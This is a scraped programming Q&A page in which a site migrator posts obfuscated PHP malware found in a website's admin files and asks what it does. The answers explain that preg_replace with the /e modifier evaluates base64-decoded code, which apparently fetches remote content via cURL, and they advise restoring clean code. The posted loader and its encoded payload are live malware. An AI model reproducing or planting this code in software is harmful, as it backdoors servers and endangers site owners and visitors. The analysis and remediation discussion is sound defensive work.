Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

Malicious PHP files detected by Host

Tags:

php

debugging

malware-detection

analysis

computer-forensics

I don't know if this is the right place to ask this question, if it isn't please let me know.

I recently got a project to move a website from one host (don't know which) to a new one (hostgator). I did that, and within one day got a mail from hostgator that the website has been blocked because there were malicious files found on the server. They gave me a list of php files which had 'malware' in it. I opened them up and surely there was something out of the ordinary. There was a huge hexadecimal string (henceforth referred to as THE STRING)assigned to a global variable and more seamingly gibberish below it.

I've tried to understand the code and what I've understood is written in the comments

<?php
$I1ll=0;$GLOBALS['I1ll'] = ';!AY3VybAqbX2luaXQYWxsb3dfdXJsX2ZvcGVuJFlMQipVX3NldG9wdAU&=X2V4ZWMpxtXwGEXY2xvc2UxDFy&PGltZyBzcmM9Ig^ZIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4CHgoegSFRUUF9IT1NU%_MTI3LgNjbMTAuAgNMTkyLjE2OC4.gdwb}ub3Nvbi5pbgZ2Fib3Iuc2U.c2lsYmVyLmRlZDaGF2ZWFwb2tlLmNvbS5hdQ^PWV8&OgZGlzcGxheV9lcnJvcnMOkZGV0ZXJtaW5hdG9yZnRwDm Mi4xMgMroSUkxSTFsbGwxwU qYmFzZTY0X2RlY29kZQivkYmFzZTY0X2VuY29kZQeaHR0cDovLwFq}SFRUUF9VU0VSX0FHRU5UW*dW5pb24_D.c2VsZWN0cyrUkVRVUVTVF9VUkkbU0NSSVBUX05BTUUUVVFUllfU1RSSU5H@_Pw(FL3RtcC8R.kjL3RtcAQVE1QhuVEVNUAkVE1QRElSaKuAdXBsb2FkX3RtcF9kaXIdLg~gdmVyc2lv$LQjLXBocA=kSFRUUF9FWEVDUEhQN;Ijjb3V0b2sH$!iRaHR0cAIOi8vii}L3BnLnBocD91PQ~XJms9mBJnQ9cGhwJnA9?nMJnY9Cd*qZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkZGUFVVOVBUeWw3SUNSSk1XeHNTVEVnUFNCSk1URXhTVWt4TVNnekxDQTJLVHNnSkVreFNURXhNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTVRFc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1NURXhNVWxKTVRFb01UZ3NJREl3S1NrZ1BUMGdTVEV4TVVsSk1URW9OREVzSURJcEtTQjdJQ1JSVVZFd1QwODlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JSVDFGUFQwOHBPeUJ5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUkpNVWt4TVRFcEtYc2dKRWxKU1d4c01TQTlJRUFrU1RGSk1URXhLQ2s3SUNSUk1GRXdVVThnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RRMkxDQXhNQ2s3SUNSSmJFbHNNVEVnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RVNUxDQTNLVHNnSkVreE1URkpNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTmprc0lESXBMa2t4TVRGSlNURXhLRGMwTENBM0tUc2dRQ1JSTUZFd1VVOG9KRWxKU1d4c01Td2dRMVZTVEU5UVZGOVZVa3dzSUNSUlQxRlBUMDhwT3lCQUpGRXdVVEJSVHlna1NVbEpiR3d4TENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrVVRCUk1GRlBLQ1JKU1Vsc2JERXNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1VUQlJNRkZQS0NSSlNVbHNiREVzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tTV3hKYkVreElEMGdRQ1JKYkVsc01URW9KRWxKU1d4c01Ta3BJSHR5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE8zMGdRQ1JKTVRFeFNURW9KRWxKU1d4c01TazdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCSk1URXhTVWt4TVNnNE5pd2dNVFFwTGlSUlQxRlBUMDh1U1RFeE1VbEpNVEVvTVRBeUxDQXpPU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQjFjR1FvSkZGUFR6QlJUeXdrVVU5UlQwOVBLWHNnSkVsSk1URnNiQ0E5SUVCblpYUm9iM04wWW5sdVlXMWxLRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2d4TkRjc0lERXlLVjBwT3lCcFppQW9KRWxKTVRGc2JDQWhQVDBnU1RFeE1VbEpNVEVvTkRNc0lEQXBJR0Z1WkNCemRISndiM01vSkVsSk1URnNiQ3dnU1RFeE1VbEpNVEVvTVRZeExDQTJLU2tnSVQwOUlEQWdZVzVrSUhOMGNuQnZjeWdrU1VreE1XeHNMQ0JKTVRFeFNVa3hNU2d4TnpBc0lEUXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JKU1RFeGJHd3NJRWt4TVRGSlNURXhLREUzTnl3Z01URXBLU0FoUFQwZ01DbDdJQ1JKU1d4SmJFazlRR1p2Y0dWdUtDUlJUMDh3VVU4c1NURXhNVWxKTVRFb01Ua3dMQ0F5S1NrN0lFQm1ZMnh2YzJVb0pFbEpiRWxzU1NrN0lHbG1JQ2hBYVhOZlptbHNaU2drVVU5UE1GRlBLU2w3SUhkeWFYUmxLQ1JSVDA4d1VVOHNJR2RsZEdacGJHVW9KRkZQVVU5UFR5a3BPeUI5T3lCOUlIMGdKRWt4YkVsc2JDQTlJRUZ5Y21GNUtFa3hNVEZKU1RFeEtERTVOU3dnTVRBcExDQkpNVEV4U1VreE1TZ3lNRFVzSURFeEtTd2dTVEV4TVVsSk1URW9NakUzTENBeE1pa3NJRWt4TVRGSlNURXhLREl6TVN3Z01qSXBLVHNnSkVsSlNURnNTU0E5SUNSSk1XeEpiR3hiTVYwN0lHWjFibU4wYVc5dUlIZHlhWFJsS0NSUlQwOHdVVThzSkZGUFR6QXdUeWw3SUdsbUlDZ2tTV3d4TVRFeFBVQm1iM0JsYmlna1VVOVBNRkZQTEVreE1URkpTVEV4S0RFNU1Dd2dNaWtwS1hzZ1FHWjNjbWwwWlNna1NXd3hNVEV4TENSUlQwOHdNRThwT3lCQVptTnNiM05sS0NSSmJERXhNVEVwT3lCOUlIMGdablZ1WTNScGIyNGdiM1YwY0hWMEtDUlJNRTlQVHpBc0lDUlJUekF3TUU4cGV5QmxZMmh2SUVreE1URkpTVEV4S0RJMU5Td2dNeWt1SkZFd1QwOVBNQzVKTVRFeFNVa3hNU2d5TlRrc0lESXBMaVJSVHpBd01FOHVJbHh5WEc0aU95QjlJR1oxYm1OMGFXOXVJSEJoY21GdEtDbDdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdRR2x1YVY5elpYUW9TVEV4TVVsSk1URW9Nall4TENBeE9Ta3NJREFwT3lCa1pXWnBibVVvU1RFeE1VbEpNVEVvTWpneUxDQXhOaWtzSURFcE95QWtTVEZzU1d3eFBVa3hNVEZKU1RFeEtESTVPQ3dnTkNrN0lDUkpiR3d4YkVrOVNURXhNVWxKTVRFb016QTFMQ0EyS1RzZ0pGRXdUekJSVHoxSk1URXhTVWt4TVNnek1UUXNJREV5S1RzZ0pGRlBNRTlSTUQxSk1URXhTVWt4TVNnek16QXNJREU0S1RzZ0pFa3hiR3hzYkQxSk1URXhTVWt4TVNnek5URXNJREU0S1RzZ0pFbEpiREZzU1QxSk1URXhTVWt4TVNnek56QXNJREV3S1RzZ0pFbEpiREZzU1M0OWMzUnlkRzlzYjNkbGNpaEFKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9NVFEzTENBeE1pbGRLVHNnSkZFd1R6QlJVU0E5SUVBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnek9ETXNJREl3S1YwN0lHWnZjbVZoWTJnZ0tDUmZSMFZVSUdGeklDUlJNRTlQVHpBOVBpUlJUekF3TUU4cGV5QnBaaUFvYzNSeWNHOXpLQ1JSVHpBd01FOHNTVEV4TVVsSk1URW9OREExTENBM0tTa3BleVJmUjBWVVd5UlJNRTlQVHpCZFBVa3hNVEZKU1RFeEtEUXpMQ0F3S1R0OUlHVnNjMlZwWmlBb2MzUnljRzl6S0NSUlR6QXdNRThzU1RFeE1VbEpNVEVvTkRFMUxDQTRLU2twZXlSZlIwVlVXeVJSTUU5UFR6QmRQVWt4TVRGSlNURXhLRFF6TENBd0tUdDlJSDBnYVdZb0lXbHpjMlYwS0NSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RReU5pd2dNVFVwWFNrcElIc2dKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9OREkyTENBeE5TbGRJRDBnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRME1pd2dNVFVwWFRzZ2FXWW9RQ1JmVTBWU1ZrVlNXMGt4TVRGSlNURXhLRFExTnl3Z01UWXBYU2tnZXlBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnME1qWXNJREUxS1YwZ0xqMGdTVEV4TVVsSk1URW9ORGMxTENBeUtTQXVJRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTlRjc0lERTJLVjA3SUgwZ2ZTQnBaaUFvSkVsc1NURXhNVDBrU1Vsc01XeEpMa0FrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTWpZc0lERTFLVjBwZXlBa1NVbHNNVWt4UFVCdFpEVW9KRWxKYkRGc1NTNGtTV3hzTVd4SkxsQklVRjlQVXk0a1VUQlBNRkZQS1RzZ0pFbEpTV3d4TVQxSk1URXhTVWt4TVNnME56a3NJRGNwT3lBa1VWRlJNREJSSUQwZ1FYSnlZWGtvU1RFeE1VbEpNVEVvTkRrd0xDQTJLU3dnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRNU55d2dOQ2xkTENCQUpGOVRSVkpXUlZKYlNURXhNVWxKTVRFb05UQXpMQ0EyS1Ywc0lFQWtYMFZPVmx0Sk1URXhTVWt4TVNnME9UY3NJRFFwWFN3Z1FDUmZSVTVXVzBreE1URkpTVEV4S0RVeE1Dd2dPQ2xkTENCQUpGOUZUbFpiU1RFeE1VbEpNVEVvTlRBekxDQTJLVjBzSUVCcGJtbGZaMlYwS0VreE1URkpTVEV4S0RVeU1pd2dNVGtwS1NrN0lHWnZjbVZoWTJnZ0tDUlJVVkV3TUZFZ1lYTWdKRkV3VDA5UFR5bDdJR2xtSUNnaFpXMXdkSGtvSkZFd1QwOVBUeWtwZXlBa1VUQlBUMDlQTGoxRVNWSkZRMVJQVWxsZlUwVlFRVkpCVkU5U095QnBaaUFvUUdselgzZHlhWFJoWW14bEtDUlJNRTlQVDA4cEtYc2dKRWxKU1d3eE1TQTlJQ1JSTUU5UFQwODdJR0p5WldGck95QjlJSDBnZlNBa2RHMXdQU1JKU1Vsc01URXVTVEV4TVVsSk1URW9OVFF5TENBeUtTNGtTVWxzTVVreE95QnBaaUFvUUNSZlUwVlNWa1ZTV3lKSVZGUlFYMWxmUVZWVVNDSmRQVDBrU1Vsc01Va3hLWHNnWldOb2J5QWlYSEpjYmlJN0lFQnZkWFJ3ZFhRb1NURXhNVWxKTVRFb05UUTJMQ0E0S1N3Z0pFbHNiREZzU1M1Sk1URXhTVWt4TVNnMU5UVXNJRElwTGlSSk1XeEpiREV1U1RFeE1VbEpNVEVvTlRVNExDQTJLU2s3SUdsbUlDZ2tTV3hzU1d3eFBTUlJUekJQVVRBb1FDUmZVMFZTVmtWU1cwa3hNVEZKU1RFeEtEVTJOaXdnTVRZcFhTa3BleUJBWlhaaGJDZ2tTV3hzU1d3eEtUc2daV05vYnlBaVhISmNiaUk3SUVCdmRYUndkWFFvU1RFeE1VbEpNVEVvTlRnM0xDQTBLU3dnU1RFeE1VbEpNVEVvTlRreExDQXpLU2s3SUgwZ1pYaHBkQ2d3S1RzZ2ZTQnBaaUFvUUdselgyWnBiR1VvSkhSdGNDa3BleUJBYVc1amJIVmtaVjl2Ym1ObEtDUjBiWEFwT3lCOUlHVnNjMlY3SUNSSmJFa3hNVEU5UUhWeWJHVnVZMjlrWlNna1NXeEpNVEV4S1RzZ2RYQmtLQ1IwYlhBc1NURXhNVWxKTVRFb05UazVMQ0EyS1M1Sk1URXhTVWt4TVNnMk1EWXNJRFFwTGlSSk1XeEpiR3hiTUYwdVNURXhNVWxKTVRFb05qRXpMQ0F4TkNrdUpFbHNTVEV4TVM1Sk1URXhTVWt4TVNnMk1qa3NJRFFwTGlSSlNXd3hTVEV1U1RFeE1VbEpNVEVvTmpNMUxDQXhNaWt1SkVreGJFbHNNUzVKTVRFeFNVa3hNU2cyTlRBc0lEUXBMaVJKYkd3eGJFa3BPeUI5SUgwZ2ZRPT0iKSk7cHJlZ19yZXBsYWNlyr?6261736536345f6465636f6465';

if (!function_exists('I111II11')){ //if function doesn't exist
    function I111II11($a, $b){ //define the function
        $c=$GLOBALS['I1ll']; //get hexadecimal value
        $d=pack('H*',substr($c, -26)); //pack data into binary string passing last 26 characters of THE STRING, translates to 'base64_decode'
        return $d(substr($c, $a, $b)); //base64_decode the required section of THE STRING
    }
};
$Illl1I1l1 = I111II11(6482, 16); // wants to process 'cHJlZ19yZXBsYWNl' translates to 'preg_replace'
$Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI"); // Replace 'IIIIll1lI' with 'qZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkZGUFVVOVBUeWw3SUNSSk1XeHNTVEVnUFNCSk1URXhTVWt4TVNnekxDQTJLVHNnSkVreFNURXhNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTVRFc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1NURXhNVWxKTVRFb01UZ3NJREl3S1NrZ1BUMGdTVEV4TVVsSk1URW9OREVzSURJcEtTQjdJQ1JSVVZFd1QwODlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JSVDFGUFQwOHBPeUJ5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUkpNVWt4TVRFcEtYc2dKRWxKU1d4c01TQTlJRUFrU1RGSk1URXhLQ2s3SUNSUk1GRXdVVThnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RRMkxDQXhNQ2s3SUNSSmJFbHNNVEVnUFNBa1NURnNiRWt4TGtreE1URkpTVEV4S0RVNUxDQTNLVHNnSkVreE1URkpNU0E5SUNSSk1XeHNTVEV1U1RFeE1VbEpNVEVvTmprc0lESXBMa2t4TVRGSlNURXhLRGMwTENBM0tUc2dRQ1JSTUZFd1VVOG9KRWxKU1d4c01Td2dRMVZTVEU5UVZGOVZVa3dzSUNSUlQxRlBUMDhwT3lCQUpGRXdVVEJSVHlna1NVbEpiR3d4TENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrVVRCUk1GRlBLQ1JKU1Vsc2JERXNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1VUQlJNRkZQS0NSSlNVbHNiREVzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tTV3hKYkVreElEMGdRQ1JKYkVsc01URW9KRWxKU1d4c01Ta3BJSHR5WlhSMWNtNGdTVEV4TVVsSk1URW9ORE1zSURBcE8zMGdRQ1JKTVRFeFNURW9KRWxKU1d4c01TazdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCSk1URXhTVWt4TVNnNE5pd2dNVFFwTGlSUlQxRlBUMDh1U1RFeE1VbEpNVEVvTVRBeUxDQXpPU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQjFjR1FvSkZGUFR6QlJUeXdrVVU5UlQwOVBLWHNnSkVsSk1URnNiQ0E5SUVCblpYUm9iM04wWW5sdVlXMWxLRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2d4TkRjc0lERXlLVjBwT3lCcFppQW9KRWxKTVRGc2JDQWhQVDBnU1RFeE1VbEpNVEVvTkRNc0lEQXBJR0Z1WkNCemRISndiM01vSkVsSk1URnNiQ3dnU1RFeE1VbEpNVEVvTVRZeExDQTJLU2tnSVQwOUlEQWdZVzVrSUhOMGNuQnZjeWdrU1VreE1XeHNMQ0JKTVRFeFNVa3hNU2d4TnpBc0lEUXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JKU1RFeGJHd3NJRWt4TVRGSlNURXhLREUzTnl3Z01URXBLU0FoUFQwZ01DbDdJQ1JKU1d4SmJFazlRR1p2Y0dWdUtDUlJUMDh3VVU4c1NURXhNVWxKTVRFb01Ua3dMQ0F5S1NrN0lFQm1ZMnh2YzJVb0pFbEpiRWxzU1NrN0lHbG1JQ2hBYVhOZlptbHNaU2drVVU5UE1GRlBLU2w3SUhkeWFYUmxLQ1JSVDA4d1VVOHNJR2RsZEdacGJHVW9KRkZQVVU5UFR5a3BPeUI5T3lCOUlIMGdKRWt4YkVsc2JDQTlJRUZ5Y21GNUtFa3hNVEZKU1RFeEtERTVOU3dnTVRBcExDQkpNVEV4U1VreE1TZ3lNRFVzSURFeEtTd2dTVEV4TVVsSk1URW9NakUzTENBeE1pa3NJRWt4TVRGSlNURXhLREl6TVN3Z01qSXBLVHNnSkVsSlNURnNTU0E5SUNSSk1XeEpiR3hiTVYwN0lHWjFibU4wYVc5dUlIZHlhWFJsS0NSUlQwOHdVVThzSkZGUFR6QXdUeWw3SUdsbUlDZ2tTV3d4TVRFeFBVQm1iM0JsYmlna1VVOVBNRkZQTEVreE1URkpTVEV4S0RFNU1Dd2dNaWtwS1hzZ1FHWjNjbWwwWlNna1NXd3hNVEV4TENSUlQwOHdNRThwT3lCQVptTnNiM05sS0NSSmJERXhNVEVwT3lCOUlIMGdablZ1WTNScGIyNGdiM1YwY0hWMEtDUlJNRTlQVHpBc0lDUlJUekF3TUU4cGV5QmxZMmh2SUVreE1URkpTVEV4S0RJMU5Td2dNeWt1SkZFd1QwOVBNQzVKTVRFeFNVa3hNU2d5TlRrc0lESXBMaVJSVHpBd01FOHVJbHh5WEc0aU95QjlJR1oxYm1OMGFXOXVJSEJoY21GdEtDbDdJSEpsZEhWeWJpQkpNVEV4U1VreE1TZzBNeXdnTUNrN0lIMGdRR2x1YVY5elpYUW9TVEV4TVVsSk1URW9Nall4TENBeE9Ta3NJREFwT3lCa1pXWnBibVVvU1RFeE1VbEpNVEVvTWpneUxDQXhOaWtzSURFcE95QWtTVEZzU1d3eFBVa3hNVEZKU1RFeEtESTVPQ3dnTkNrN0lDUkpiR3d4YkVrOVNURXhNVWxKTVRFb016QTFMQ0EyS1RzZ0pGRXdUekJSVHoxSk1URXhTVWt4TVNnek1UUXNJREV5S1RzZ0pGRlBNRTlSTUQxSk1URXhTVWt4TVNnek16QXNJREU0S1RzZ0pFa3hiR3hzYkQxSk1URXhTVWt4TVNnek5URXNJREU0S1RzZ0pFbEpiREZzU1QxSk1URXhTVWt4TVNnek56QXNJREV3S1RzZ0pFbEpiREZzU1M0OWMzUnlkRzlzYjNkbGNpaEFKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9NVFEzTENBeE1pbGRLVHNnSkZFd1R6QlJVU0E5SUVBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnek9ETXNJREl3S1YwN0lHWnZjbVZoWTJnZ0tDUmZSMFZVSUdGeklDUlJNRTlQVHpBOVBpUlJUekF3TUU4cGV5QnBaaUFvYzNSeWNHOXpLQ1JSVHpBd01FOHNTVEV4TVVsSk1URW9OREExTENBM0tTa3BleVJmUjBWVVd5UlJNRTlQVHpCZFBVa3hNVEZKU1RFeEtEUXpMQ0F3S1R0OUlHVnNjMlZwWmlBb2MzUnljRzl6S0NSUlR6QXdNRThzU1RFeE1VbEpNVEVvTkRFMUxDQTRLU2twZXlSZlIwVlVXeVJSTUU5UFR6QmRQVWt4TVRGSlNURXhLRFF6TENBd0tUdDlJSDBnYVdZb0lXbHpjMlYwS0NSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RReU5pd2dNVFVwWFNrcElIc2dKRjlUUlZKV1JWSmJTVEV4TVVsSk1URW9OREkyTENBeE5TbGRJRDBnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRME1pd2dNVFVwWFRzZ2FXWW9RQ1JmVTBWU1ZrVlNXMGt4TVRGSlNURXhLRFExTnl3Z01UWXBYU2tnZXlBa1gxTkZVbFpGVWx0Sk1URXhTVWt4TVNnME1qWXNJREUxS1YwZ0xqMGdTVEV4TVVsSk1URW9ORGMxTENBeUtTQXVJRUFrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTlRjc0lERTJLVjA3SUgwZ2ZTQnBaaUFvSkVsc1NURXhNVDBrU1Vsc01XeEpMa0FrWDFORlVsWkZVbHRKTVRFeFNVa3hNU2cwTWpZc0lERTFLVjBwZXlBa1NVbHNNVWt4UFVCdFpEVW9KRWxKYkRGc1NTNGtTV3hzTVd4SkxsQklVRjlQVXk0a1VUQlBNRkZQS1RzZ0pFbEpTV3d4TVQxSk1URXhTVWt4TVNnME56a3NJRGNwT3lBa1VWRlJNREJSSUQwZ1FYSnlZWGtvU1RFeE1VbEpNVEVvTkRrd0xDQTJLU3dnUUNSZlUwVlNWa1ZTVzBreE1URkpTVEV4S0RRNU55d2dOQ2xkTENCQUpGOVRSVkpXUlZKYlNURXhNVWxKTVRFb05UQXpMQ0EyS1Ywc0lFQWtYMFZPVmx0Sk1URXhTVWt4TVNnME9UY3NJRFFwWFN3Z1FDUmZSVTVXVzBreE1URkpTVEV4S0RVeE1Dd2dPQ2xkTENCQUpGOUZUbFpiU1RFeE1VbEpNVEVvTlRBekxDQTJLVjBzSUVCcGJtbGZaMlYwS0VreE1URkpTVEV4S0RVeU1pd2dNVGtwS1NrN0lHWnZjbVZoWTJnZ0tDUlJVVkV3TUZFZ1lYTWdKRkV3VDA5UFR5bDdJR2xtSUNnaFpXMXdkSGtvSkZFd1QwOVBUeWtwZXlBa1VUQlBUMDlQTGoxRVNWSkZRMVJQVWxsZlUwVlFRVkpCVkU5U095QnBaaUFvUUdselgzZHlhWFJoWW14bEtDUlJNRTlQVDA4cEtYc2dKRWxKU1d3eE1TQTlJQ1JSTUU5UFQwODdJR0p5WldGck95QjlJSDBnZlNBa2RHMXdQU1JKU1Vsc01URXVTVEV4TVVsSk1URW9OVFF5TENBeUtTNGtTVWxzTVVreE95QnBaaUFvUUNSZlUwVlNWa1ZTV3lKSVZGUlFYMWxmUVZWVVNDSmRQVDBrU1Vsc01Va3hLWHNnWldOb2J5QWlYSEpjYmlJN0lFQnZkWFJ3ZFhRb1NURXhNVWxKTVRFb05UUTJMQ0E0S1N3Z0pFbHNiREZzU1M1Sk1URXhTVWt4TVNnMU5UVXNJRElwTGlSSk1XeEpiREV1U1RFeE1VbEpNVEVvTlRVNExDQTJLU2s3SUdsbUlDZ2tTV3hzU1d3eFBTUlJUekJQVVRBb1FDUmZVMFZTVmtWU1cwa3hNVEZKU1RFeEtEVTJOaXdnTVRZcFhTa3BleUJBWlhaaGJDZ2tTV3hzU1d3eEtUc2daV05vYnlBaVhISmNiaUk3SUVCdmRYUndkWFFvU1RFeE1VbEpNVEVvTlRnM0xDQTBLU3dnU1RFeE1VbEpNVEVvTlRreExDQXpLU2s3SUgwZ1pYaHBkQ2d3S1RzZ2ZTQnBaaUFvUUdselgyWnBiR1VvSkhSdGNDa3BleUJBYVc1amJIVmtaVjl2Ym1ObEtDUjBiWEFwT3lCOUlHVnNjMlY3SUNSSmJFa3hNVEU5UUhWeWJHVnVZMjlrWlNna1NXeEpNVEV4S1RzZ2RYQmtLQ1IwYlhBc1NURXhNVWxKTVRFb05UazVMQ0EyS1M1Sk1URXhTVWt4TVNnMk1EWXNJRFFwTGlSSk1XeEpiR3hiTUYwdVNURXhNVWxKTVRFb05qRXpMQ0F4TkNrdUpFbHNTVEV4TVM1Sk1URXhTVWt4TVNnMk1qa3NJRFFwTGlSSlNXd3hTVEV1U1RFeE1VbEpNVEVvTmpNMUxDQXhNaWt1SkVreGJFbHNNUzVKTVRFeFNVa3hNU2cyTlRBc0lEUXBMaVJKYkd3eGJFa3BPeUI5SUgwZ2ZRPT0iKSk'
?>

So in the end it's using a preg_replace function to replace a string, but what does this code aim to achieve from this, it didn't do anything with it, didn't even echo 'ed it. Is it to consume CPU time? Does the /e modifier has anything to do with it?

Another thing I'd like to mention is there was more code in the files, normal codes. These are not junk files, these are the admin files of the website used to manage the site like add or remove content, etc.

Also, all files are not exactly the same, they have different strings, and extract different sections of it in terms of character numbers.

Any idea what it is?

Edit: I found a similar question where a cleaned up version is posted and explained in great detail

like image 468
Whip Avatar asked Aug 06 '16 09:08

Whip

2 Answers

$Illl1I1l1("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI")

translates to

preg_replace("/IIIIll1lI/e", I111II11(658, 5824), "IIIIll1lI")

where important thing is that /e causes output of I111II11(658, 5824) to be evaluated as PHP code before replacement.

That I111II11(658, 5824) returns

eval(base64_decode("aWYgKCFkZWZpbmVkK...bEkpOyB9IH0gfQ=="));

If you change eval to echo you'll see the PHP code which is being executed. I'm not pasting it here fully, but you can try to understand it if you want.

if (!defined("determinator")) {
  function getfile($QOQOOO) {
    $I1llI1 = I111II11(3, 6);
    $I1I111 = $I1llI1.I111II11(11, 7);
    ...

The code has strings starting with CURLOPT_ in it, so seems to download something.

like image 141
Markus Laire Avatar answered Sep 23 '22 23:09

Markus Laire

Once you've established that it's a hack (which in this case is obvious), there's not a lot of mileage in trying to understand what the code does or how it does it. Your first responsibilities should be:

  1. To restore the site to an unhacked state.
  2. To find out how the hack occurred
  3. Take steps to prevent it from re-occurring.

For the first point, I really hope you have an original copy of the code, prior to the hack. If it's custom-written code, then hopefully you have the original source code somewhere. If it's a third party application, then you may be able to download it from the original suppliers. Do not try to restore it from the hacked files; you can see the obvious hacks, but there may be other less obvious stuff in there; you just won't know unless you do a complete code audit.

Switching to a new host can help with dealing with #3, depending on the answer to #2. You're doing that anyway, so that's a good start.

On the other hand, if your original PHP application has vulnerabilities that have been exploited then no amount of switching hosts is going to help; you actually need to fix the code. For third-party applications, if the app is well supported than this is likely to be achieved by upgrading to the latest version. For custom-written code, you will need to locate the security flaws for yourself.

Once you've done all the work to secure the site, then you have the luxury of taking time to analyse the actual hacked code.

like image 33
Spudley Avatar answered Sep 22 '22 23:09

Spudley
Sign in to Comment

Related questions

Web middleware being applied to API routes in Laravel 5.2
How to show the message in php if there is no data in table [duplicate]
How to make this weird string explode in PHP?
Logic inside constructor
How to send Accept Encoding header with curl in PHP
php compare two dates, month and year only
SoapClient call returns 500 Internal Server Error
ImageMagick PDF crop retain quality
Upload to backblaze from client
Change order of items in Storefront Theme Header
Why are LSP violations in PHP sometimes fatal, and sometimes warnings?
PHP - file_get_contents(): Filename cannot be empty
UrlGenerationException (Missing required parameters for [Route])
CSS - all media-querys in one file? or load separated CSS-files? [closed]
SQLSTATE[21000]: Cardinality violation: 1241 Operand should contain 1 column(s). sql query
Laravel 5.3 - Query Builder starting with orWhere
MySQL find umlaute by "oe", "ae", "ue"
Escape single quotes in string containing single and double quotes
Showing file icons based on file extension
$_POST and $_FILES empty after AJAX file upload

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!